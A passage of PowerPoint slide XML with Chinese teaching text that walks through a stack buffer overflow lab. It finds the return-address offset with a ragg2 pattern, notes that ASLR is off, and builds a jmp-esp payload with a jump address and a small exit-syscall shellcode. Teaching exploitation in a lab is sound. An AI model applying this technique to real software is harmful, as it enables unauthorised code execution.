          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="表格 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6334210" y="3591411"/>
          <a:ext cx="5171042" cy="2030626"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5171042"/>
              </a:tblGrid>
              <a:tr h="2030626">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600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>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bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>看到程序发生段错误, 并且PC指针eip的值为0x41494141, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>表明用的是小端存储，翻译过来就是</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>AAIA,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>查找字符串，出现在该序列的第</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>23</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>个</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>, 所以可以确定输入溢出到第23字节时覆盖了PC指针. </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:effectLs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600" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:lnL>
                      <a:noFill/>
                    </a:lnL>
                    <a:lnR>
                      <a:noFill/>
                    </a:lnR>
                    <a:lnT>
                      <a:noFill/>
                    </a:lnT>
                    <a:lnB>
                      <a:noFill/>
                    </a:lnB>
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1107440" y="1226820"/>
            <a:ext cx="10358120" cy="1938020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>确定缓冲区的大小</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     返回地址看似是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>buf+10, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>但考虑到编译器的不同会导致预留</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>对齐</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不同的空间</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>所以需要精确确认</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>生成若干规则字符串：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>$ ragg2 -P 40 -r</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     AAABAACAADAAEAAFAAGAAHAAIAAJAAKAALAAMAAN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:latin typeface="+mn-ea"/>
              <a:cs typeface="+mn-ea"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079702" y="1843722"/>
            <a:ext cx="5629275" cy="3171825"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="图片 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6949551" y="2537350"/>
            <a:ext cx="3619500" cy="1609725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079702" y="1013376"/>
            <a:ext cx="9414954" cy="829945"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>确定</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的首地址</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>反汇编foo函数：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="文本框 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079702" y="5155251"/>
            <a:ext cx="9414954" cy="368300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的首地址为ebp-0x12，即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0xffffc578-0x12</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="文本框 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1079701" y="5664922"/>
            <a:ext cx="9653401" cy="645160"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>这里关闭了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ASLR,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>所以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>地址固定。但是在实际的操作中，由于操作系统还有环境等原因，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>会有变化，所以通过确认缓冲区大小及首地址，把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>写入的方法，不通用。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="830263" y="1266824"/>
            <a:ext cx="10531474" cy="4761113"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通用的方法：在程序中，寻找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>之类的指令片段来将执行流引导到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>上。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>在正常的操作中，通过反汇编和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>gadgets</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>来寻找这类关键跳转。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Payload=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>*22+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跳转地址</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>+shellcode</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>跳转地址：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x21\x85\x04\x08</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Shellcode=\xb8\x01\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xbb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x42\x00\x00\x00\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>\x80</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>为了增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>的鲁棒性，我们可以在跳转地址和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>中间来添加若干</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="图片 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
